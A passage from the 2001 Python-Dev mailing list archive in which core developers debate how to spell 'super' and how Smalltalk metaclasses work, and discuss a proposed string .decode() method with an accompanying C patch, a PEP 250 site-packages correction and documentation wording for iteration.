least for now; perhaps it could be generalized > > to work at class scope as well as method scope, but let's keep > > it simple) > > Yes, that's about the only way it can be made to work. The compiler > will have to (1) detect that 'super' is a free variable, and (2) make > it a local and initialize it with the proper magic. Or, to relieve > the burden from the symbol table, we could make super a keyword, at > the cost of breaking existing code. I'm not at all sure I like the idea of 'super'. It's far more magic that I am used to (coming from Python at least). Currently, we spell 'super' like this: class foo(bar): def __repr__(self): return bar.__repr__(self) # that's super! I like the explicit nature of it. As Guido points out however, this ends up being ambiguous when we try to make classes more "instance-like". Now, how do I like to spell super? class foo(bar): def __repr__(self): return bar._.__repr__(self) # now that's really super! or, for those who like the "keyword": class foo(bar): def __repr__(self): super = bar._ return super.__repr__(self) The trick here in the implementation of getattr on the '_'. It return a proxy object for the class. When attributes are accessed through it a different search path is taken. This path is the same path that would be taken by instance attribute look up. In my code, I refer to this object as the 'unbound instance'. Since accessing a function through this object will yield an unbound instance method, the name makes sense to me. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From thomas.heller at ion-tof.com Wed May 2 16:49:02 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:49:02 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook> > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ? in which case > super is something like: > > import new > > class super: > def __init__(self, instance): > self.instance = instance > def __getattr__(self, name): > for klass in self.instance.__class__.__bases__: > member = getattr(klass, name, None) > if member: > if callable(member): > return new.instancemethod(member, self.instance, klass) > return member > raise AttributeError(name) > No, it's not the same. Consider: class X: def test(self): print "test X" class Y(X): def test(self): print "test Y" super(self).test() class Z(Y): pass X().test() print Y().test() print Z().test() print This prints: test X test Y test X test Y test Y (more test Y lines deleted) Runtime error: maximum recursion depth exceeded This is because super(self).test for the Z() object should start the search in the X class, not in the Y class. Thomas From thomas.heller at ion-tof.com Wed May 2 16:53:17 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:53:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook> This implementation of super works correctly: import new class super: def __init__(self, instance, klass): self.instance = instance self.klass = klass def __getattr__(self, name): for klass in (self.klass,) + self.klass.__bases__: member = getattr(klass, name, None) if member: if callable(member): return new.instancemethod(member, self.instance, klass) return member raise AttributeError(name) class X: def test(self): print "test X" class Y(X): def test(self): print "test Y" super(self, X).test() class Z(Y): pass X().test() print Y().test() print Z().test() print Thomas From donb at abinitio.com Wed May 2 17:31:45 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 11:31:45 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105021531.LAA08940@localhost.localdomain> Guido van Rossum wrote, > AFAIK, Smalltalk has only single inheritance, and so does Java, so > there 'super' is enough. Will we need to add a "::" operator to > Python??? Multiple inheritance introduces a potential wrinkle in my definition of the unbound instance. The problem is that search starts one level too high. That is in: class foo(b1, b2): def __repr__(self): super = b1._ #this one super = b2._ #or this one? return super.__repr__(self) we dont know which base class to choose as the starting point for the search. This problem already exist. Now, if we want to avoid it, this: class foo(b1, b2): def __repr__(self): super = foo.__super__ return super.__repr__(self) comes to mind. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...Will hack for sushi... From donb at abinitio.com Wed May 2 17:37:39 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 11:37:39 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <200105021537.LAA09063@localhost.localdomain> "Fredrik Lundh" wrote, > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ? in which case > super is something like: super is a lexically scoped concept. You cant ask the instance for it since it's value is different depending on in which it is needed Just as: class foo(bar): def __repr__(self): return self.__class__.__repr__(self) would get you into an infinite loop, while: class foo(bar): def __repr__(self): return bar.__repr__(self) wont. Now, dont go thinking that class foo(bar): def __repr__(self): return self.__class__.__base__[0].__repr__(self) will do you any good either ;) Because it wont! -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From guido at digicool.com Wed May 2 19:02:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:02:19 -0500 Subject: [Python-Dev] Unicode and the Windows file system. In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000." References: Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> > Now that 2.1 is out the door, how do we feel about getting these Unicode > changes in? > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 No problem for me, although the context-sensitive semantics of the MBCS encoding still elude me. (Who cares, it's Windows. :-) Are you & MAL capable of sorting this out? Do you want me to add a +1 comment to the tracker? --Guido van Rossum (home page: http://www.python.org/~guido/) From gmcm at hypernet.com Wed May 2 18:01:20 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Wed, 2 May 2001 12:01:20 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> References: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <3AEFF710.9471.8025D7EA@localhost> Hmmm. Some time ago, Tim asked the question: "Why do you wnat this stuff?". As far as I can recall, he got 2 answers: "So I don't have to 'initialize(Klass)'" and "me, too". I don't think those qualify as answers. Some time ago (cf, types-sig brouhaha of a couple years ago) I concluded that the only purpose for this stuff was __getattr__ and __setattr__ hacks. I reached this conclusion by going nutzo using (Guido's) metaclass hook, and studying the available uses of ExtensionClass (I could find no public usage of Don's elegant madness). I rather liked Guido's "Turtles all the way down" (but his description was so cryptic that my interpretation may have been a hallucination), and I suspect he's still headed that way. Nonetheless, I would like to see this discussion of the elegance of SmallTalk's incompatible model (and how to fudge it in Python) balanced by some discussion of the expected pragmatic benefits. (That's a different topic from subclassing types.) start-with-"if-God-wanted-metaclasses-he-wouldn't-have- invented-proxies"--ly y'rs - Gordon From fredrik at effbot.org Wed May 2 17:47:08 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 17:47:08 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid> Donald Beaudry wrote: > super is a lexically scoped concept. You cant ask the instance for it > since it's value is different depending on in which it is needed oh, you want people to be able to inherit from classes using super? guess we'll have to use sys._getframe().f_back.f_method.im_class instead, then ;-) (any special reason why frame objects don't contain a pointer to the corresponding function/method object?) Cheers /F From mal at lemburg.com Wed May 2 18:11:50 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 18:11:50 +0200 Subject: [Python-Dev] Unicode and the Windows file system. References: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> Message-ID: <3AF031C6.324D25D5@lemburg.com> Guido van Rossum wrote: > > > Now that 2.1 is out the door, how do we feel about getting these Unicode > > changes in? > > > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 > > No problem for me, although the context-sensitive semantics of the > MBCS encoding still elude me. (Who cares, it's Windows. :-) > > Are you & MAL capable of sorting this out? Do you want me to add a +1 > comment to the tracker? I'll take care of the parser marker stuff and Mark can do the rest ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 19:17:50 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:17:50 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200." <00a901c0d31f$2797a370$e46940d5@hagrid> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> <00a901c0d31f$2797a370$e46940d5@hagrid> Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com> > (any special reason why frame objects don't contain a > pointer to the corresponding function/method object?) Because (until now) there was no need. The frame needs to know about the code object, but the rest of the function's context is not needed. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 20:13:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:13:17 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! Message-ID: <3AF04E3D.45AE4F4B@lemburg.com> We already have "data".encode(encoding) which encodes the string data by passing it through the encoder of the given encoding. Wouldn't it be worthwhile to add direct access to codec decoders through string methods as well ? (Note that this addition only makes sense for string objects, since Unicode cannot be decoded.) Also, would there be any objections adding some more standard codecs to the system ? I'm thinking of wrapping the binascii module APIs in form of codecs... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 21:18:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:18:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200." <3AF04E3D.45AE4F4B@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com> > We already have "data".encode(encoding) which encodes the string data > by passing it through the encoder of the given encoding. > > Wouldn't it be worthwhile to add direct access to codec decoders > through string methods as well ? > > (Note that this addition only makes sense for string objects, > since Unicode cannot be decoded.) > > Also, would there be any objections adding some more standard > codecs to the system ? I'm thinking of wrapping the binascii > module APIs in form of codecs... Can you provide examples of where this can't be done using the existing approach? Code-bloat police anyone? --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 20:32:46 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:32:46 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> Message-ID: <3AF052CE.E928BDA1@lemburg.com> Guido van Rossum wrote: > > > We already have "data".encode(encoding) which encodes the string data > > by passing it through the encoder of the given encoding. > > > > Wouldn't it be worthwhile to add direct access to codec decoders > > through string methods as well ? > > > > (Note that this addition only makes sense for string objects, > > since Unicode cannot be decoded.) > > > > Also, would there be any objections adding some more standard > > codecs to the system ? I'm thinking of wrapping the binascii > > module APIs in form of codecs... > > Can you provide examples of where this can't be done using the > existing approach? There is no existing elegant approach except hooking up to the codecs directly. Adding .decode() is really a matter of adding symmetry. Here are some example of how these two codec methods could be used: xmltext = binarydata.encode('base64') ... binarydata = xmltext.decode('base64') zzz = data.encode('gzip') ... data = zzz.decode('gzip') jpegimage = gifimage.decode('gif').encode('jpeg') mp3audio = wavaudio.decode('wav').encode('mp3') etc. Basically all content transfer encodings can take advantage of these two methods. It's not really code bloat, BTW, since the C API is there; the .decode() method would just expose it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 21:38:10 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:38:10 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200." <3AF052CE.E928BDA1@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com> > > Can you provide examples of where this can't be done using the > > existing approach? > > There is no existing elegant approach except hooking up to the > codecs directly. Adding .decode() is really a matter of adding > symmetry. Yes, but symmetry is good except when it isn't. :-) > Here are some example of how these two codec methods could > be used: > > xmltext = binarydata.encode('base64') > ... > binarydata = xmltext.decode('base64') > > zzz = data.encode('gzip') > ... > data = zzz.decode('gzip') > > jpegimage = gifimage.decode('gif').encode('jpeg') > > mp3audio = wavaudio.decode('wav').encode('mp3') > > etc. How would you do this currently? > Basically all content transfer encodings can take advantage of > these two methods. > > It's not really code bloat, BTW, since the C API is there; > the .decode() method would just expose it. Show me the patch and I'll decide whether it's code bloat. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Wed May 2 20:20:24 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 20:20:24 +0200 Subject: [Python-Dev] PEP 250 buglet Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid> PEP 250 suggests changing the sitedirs setup in site.py from sitedirs = [prefix] to sitedirs == [makepath(prefix, "lib", "site-packages")] on windows. it then goes on to say that This change does not preclude packages using the current location -- the change only adds a directory to sys.path, it does not remove anything. this isn't true (even after correcting the typo), since the sitedirs list isn't only added to the path; it's also used to look for PTH files. after this change, PTH files located under prefix will no longer be found. the following change works a bit better: sitedirs = [prefix, makepath(prefix, "lib", "site-packages")] Cheers /F From mal at lemburg.com Wed May 2 21:55:25 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 21:55:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> Message-ID: <3AF0662D.48671B4E@lemburg.com> Guido van Rossum wrote: > > > > Can you provide examples of where this can't be done using the > > > existing approach? > > > > There is no existing elegant approach except hooking up to the > > codecs directly. Adding .decode() is really a matter of adding > > symmetry. > > Yes, but symmetry is good except when it isn't. :-) > > > Here are some example of how these two codec methods could > > be used: > > > > xmltext = binarydata.encode('base64') > > ... > > binarydata = xmltext.decode('base64') > > > > zzz = data.encode('gzip') > > ... > > data = zzz.decode('gzip') > > > > jpegimage = gifimage.decode('gif').encode('jpeg') > > > > mp3audio = wavaudio.decode('wav').encode('mp3') > > > > etc. > > How would you do this currently? By looking up the codecs using the codec registry and then calling them directly. > > Basically all content transfer encodings can take advantage of > > these two methods. > > > > It's not really code bloat, BTW, since the C API is there; > > the .decode() method would just expose it. > > Show me the patch and I'll decide whether it's code bloat. :-) I've attached the patch. Due to a small reorganisation the patch is a little longer -- symmetry has its price at C level too ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ -------------- next part -------------- --- CVS-Python/Include/stringobject.h Sat Feb 24 10:30:49 2001 +++ Dev-Python/Include/stringobject.h Wed May 2 21:05:12 2001 @@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE PyObject *str, /* string object */ const char *encoding, /* encoding */ const char *errors /* error handling */ ); +/* Decodes a string object and returns the result as Python string + object. */ + +extern DL_IMPORT(PyObject*) PyString_AsDecodedString( + PyObject *str, /* string object */ + const char *encoding, /* encoding */ + const char *errors /* error handling */ + ); + /* Provides access to the internal data buffer and size of a string object or the default encoded version of an Unicode object. Passing NULL as *len parameter will force the string buffer to be 0-terminated (passing a string with embedded NULL characters will cause an exception). */ --- CVS-Python/Objects/stringobject.c Wed May 2 16:19:22 2001 +++ Dev-Python/Objects/stringobject.c Wed May 2 21:04:34 2001 @@ -138,42 +138,56 @@ PyString_FromString(const char *str) PyObject *PyString_Decode(const char *s, int size, const char *encoding, const char *errors) { - PyObject *buffer = NULL, *str; + PyObject *v, *str; + + str = PyString_FromStringAndSize(s, size); + if (str == NULL) + return NULL; + v = PyString_AsDecodedString(str, encoding, errors); + Py_DECREF(str); + return v; +} + +PyObject *PyString_AsDecodedString(PyObject *str, + const char *encoding, + const char *errors) +{ + PyObject *v; + + if (!PyString_Check(str)) { + PyErr_BadArgument(); + goto onError; + } if (encoding == NULL) encoding = PyUnicode_GetDefaultEncoding(); /* Decode via the codec registry */ - buffer = PyBuffer_FromMemory((void *)s, size); - if (buffer == NULL) - goto onError; - str = PyCodec_Decode(buffer, encoding, errors); - if (str == NULL) + v = PyCodec_Decode(str, encoding, errors); + if (v == NULL) goto onError; /* Convert Unicode to a string using the default encoding */ - if (PyUnicode_Check(str)) { - PyObject *temp = str; - str = PyUnicode_AsEncodedString(str, NULL, NULL); + if (PyUnicode_Check(v)) { + PyObject *temp = v; + v = PyUnicode_AsEncodedString(v, NULL, NULL); Py_DECREF(temp); - if (str == NULL) + if (v == NULL) goto onError; } - if (!PyString_Check(str)) { + if (!PyString_Check(v)) { PyErr_Format(PyExc_TypeError, "decoder did not return a string object (type=%.400s)", - str->ob_type->tp_name); - Py_DECREF(str); + v->ob_type->tp_name); + Py_DECREF(v); goto onError; } - Py_DECREF(buffer); - return str; + return v; onError: - Py_XDECREF(buffer); return NULL; } PyObject *PyString_Encode(const char *s, int size, @@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb return NULL; return PyString_AsEncodedString((PyObject *)self, encoding, errors); } +static char decode__doc__[] = +"S.decode([encoding[,errors]]) -> string\n\ +\n\ +Return a decoded string version of S. Default encoding is the current\n\ +default string encoding. errors may be given to set a different error\n\ +handling scheme. Default is 'strict' meaning that encoding errors raise\n\ +a ValueError. Other possible values are 'ignore' and 'replace'."; + +static PyObject * +string_decode(PyStringObject *self, PyObject *args) +{ + char *encoding = NULL; + char *errors = NULL; + if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors)) + return NULL; + return PyString_AsDecodedString((PyObject *)self, encoding, errors); +} + + static char expandtabs__doc__[] = "S.expandtabs([tabsize]) -> string\n\ \n\ Return a copy of S where all tab characters are expanded using spaces.\n\ If tabsize is not given, a tab size of 8 characters is assumed."; @@ -2347,10 +2373,11 @@ string_methods[] = { {"title", (PyCFunction)string_title, 1, title__doc__}, {"ljust", (PyCFunction)string_ljust, 1, ljust__doc__}, {"rjust", (PyCFunction)string_rjust, 1, rjust__doc__}, {"center", (PyCFunction)string_center, 1, center__doc__}, {"encode", (PyCFunction)string_encode, 1, encode__doc__}, + {"decode", (PyCFunction)string_decode, 1, decode__doc__}, {"expandtabs", (PyCFunction)string_expandtabs, 1, expandtabs__doc__}, {"splitlines", (PyCFunction)string_splitlines, 1, splitlines__doc__}, #if 0 {"zfill", (PyCFunction)string_zfill, 1, zfill__doc__}, #endif From mal at lemburg.com Wed May 2 22:36:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 22:36:30 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AF06FCE.854D4DF7@lemburg.com> Here's a little fun codec to play with. It encodes the input using the ROT13 encoding (which is 1-1 and idempotent). The main difference over the existing codecs is that it returns a string rather than Unicode. To install it, simply place it in some directory on your Python path. Here's some sample output (Netscape can unscramble this BTW): """ Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vqrzcbgrag). Gur znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf n fgevat engure guna Havpbqr. Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba cngu. """ -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ -------------- next part -------------- A non-text attachment was scrubbed... Name: rot_13.py Type: text/python Size: 2066 bytes Desc: not available URL: From guido at digicool.com Thu May 3 00:11:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 17:11:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200." <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> > [From Jim Althoff] > > In the list below, indentation indicates class hieararchy (superclass -- > > subclass) > The indentation, unfortunately, seems to be destroyed. [...] > A question for Jim (this is more Smalltalk than Python related): > How does the Behaviour class fit into this picture? Jim responded with a much clearer diagram, and as a bonus an answer to your question about Behaviour! > Hi Guido, > > Sorry about the mangled diagram. It's kind of tricky doing this with just > text. :-) Anyway, below is a -- hopefully -- improved diagram and > description. > > At the very bottom is an answer to the question about "Behavior". > > Jim > > ========================================== > > Smalltalk-80 (simplified) class/metaclass structure: > > Terminology: > o A "class" is an object that can be instantiated. > o A "metaclass" is a class and is one such that when _it_ is instantiated > _that_ instance is _itself_ a class (which can be instantiated). > (A metaclass is a specialization of class). > > Essentially, there are two parallel hierarchies: 1) the class hierarchy > and 2) the metaclass hierarchy. The class hierarchy starts with class > Object. The metaclass hierarchy starts right below Class with the > metaclass ObjectMetaClass. > > > o Object > o Class > o MetaClass > o ObjectMetaClass > o ClassMetaClass > o MetaClassMetaClass > > Object is the top of the class hierarchy (and total hierarchy). It has no > superclass. It is the only class that has no superclass. > Class is a subclass of Object. > MetaClass is a subclass of Class. > > ObjectMetaClass is also a subclass of Class. > ClassMetaClass is a subclass of ObjectMetaClass. > MetaClassMetaClass is a subclass of ClassMetaClass. > > Adding in application classes Rectangle and SpamRectangle then might look > like: > > > o Object > o Class > o MetaClass > o ObjectMetaClass > o ClassMetaClass > o MetaClassMetaClass > o RectangleMetaClass > o SpamRectangleMetaClass > o Rectangle > o SpamRectangle > > Rectangle is a subclass of Object. > SpamRectangle is a subclass of Rectangle. > > RectangleMetaClass is a subclass of ObjectMetaClass. > SpamRectangleMetaClass is a subclass of RectangleMetaClass. > > Rectangle is an instance of RectangleMetaClass. > SpamRectangle is an instance of SpamRectangleMetaClass. > (SpamRectangleMetaClass is an instance of MetaClass.) > > The next list shows both the subclass- and the instanceOf- relationships > between classes and metaclasses. > > In this list a class listed below another class is a subclass of it. > SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam -- > the class of which class Spam is an instance). > > Class > Object instanceOf ObjectMC instanceOf MetaClass > Class instanceOf ClassMC instanceOf MetaClass > MetaClass instanceOf MetaClassMC instanceOf MetaClass > > ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances > of MetaClass. > > MetaClass is an instance of MetaClassMetaClass But MetaClassMetaClass is > an instance of MetaClass. So this particular relationship is circular. > (In Smalltalk-76, Class was an instance of itself.) > > Application classes would have a similar, parallel hierarchy between > classes and their associated metaclasses. For example: > > Object instanceOf ObjectMC instanceOf MetaClass > Rectangle instanceOf RectangleMC instanceOf MetaClass > SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass > > When you create class SpamRectangle as a subclass of class Rectangle, the > code in the class-creation method first creates the metaclass > SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of > RectangleMetaClass. The code then creates the SpamRectangle class as an > instance of the SpamRectangleMetaClass metaclass it just created. > > You can then create instances of class SpamRectangle. > > SpamRectangle "instance methods" reside in the method dict of > SpamRectangle. > SpamRectangle "class methods" reside in the method dict of > SpamRectangleMetaClass. > > ============================ > > Regarding Thomas' question: > > The Smalltalk-80 class hierarchy actually has a bit more factoring than > what I show above. In particular, Class and MetaClass are subclasses of > the class ClassDescription. ClassDescription is a subclass of class > Behavior. Behavior is a subclass of Object. > > So it looks like: > > > o Object > o Behavior > o ClassDescription > o MetaClass > o Class > o ObjectMetaClass > o BehaviorMetaClass > o ClassDescriptionMetaClass > o MetaClassMetaClass > o ClassMetaClass > > Class Behavior basically abstracts the creation and handling of method > dict.s. Class ClassDescription factors out common, reusable code between > MetaClass and Class. Clearly there are a number of ways of designing (or > over-designing ) this part of the hierarchy. The key idea, though, > was to use the subclassing mechanism as a way of supportig specialized > class methods. > > ============================= --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Wed May 2 23:24:28 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 2 May 2001 17:24:28 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77 In-Reply-To: Message-ID: [Fred L. Drake] > Update the filter() and list() descriptions to include information > about the support for containers and iteration. > ... > \begin{funcdesc}{list}{sequence} > ! Return a list whose items are the same and in the same order as > ! \var{sequence}'s items. \var{sequence} may be either a sequence, > ! a container that supports iteration, or an iterator object. > ... [and similarly for filter()] Before we repeat this last incantation umpteen more times in the docs, is this how we want it to read in the end? The truth of the implementation and of the design is that "sequence" is any object that supports iteration, period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they raise TypeError). "A sequence" and "an iterator object" *always* support iteration, so naming them too appears to draw a distinction that doesn't exist. Suggested alternative: \var{sequence} must support iteration (see XXX). where XXX is common boilerplate explaining what "support iteration" means, and that sequences and iterator objects are just particular cases of that. Note that this boilerplate may expand to include generators too before 2.2 is real, and a generator isn't really "a container that supports iteration" (the word "container" is a strain in the generator context). That is, a long-winded incantation is just going to get longer over time, and if it's repeated umpteen places in the docs I doubt they'll all get updated when needed. From michel at digicool.com Wed May 2 23:43:42 2001 From: michel at digicool.com (Michel Pelletier) Date: Wed, 2 May 2001 14:43:42 -0700 (PDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> Message-ID: On Wed, 2 May 2001, Guido van Rossum wrote: > > > > o Object > > o Class > > o MetaClass > > o ObjectMetaClass > > o ClassMetaClass > > o MetaClassMetaClass > > > > Object is the top of the class hierarchy (and total hierarchy). It has no > > superclass. It is the only class that has no superclass. > > Class is a subclass of Object. > > MetaClass is a subclass of Class. > > > > ObjectMetaClass is also a subclass of Class. > > ClassMetaClass is a subclass of ObjectMetaClass. > > MetaClassMetaClass is a subclass of ClassMetaClass. Does this go on ad infinitum? ie, is there a ClassMetaClassMetaClass which sublcasses MetaClassMetaClass and so on? I was under the impression from talking to JimF that Smalltalk eventually stopped at a class that 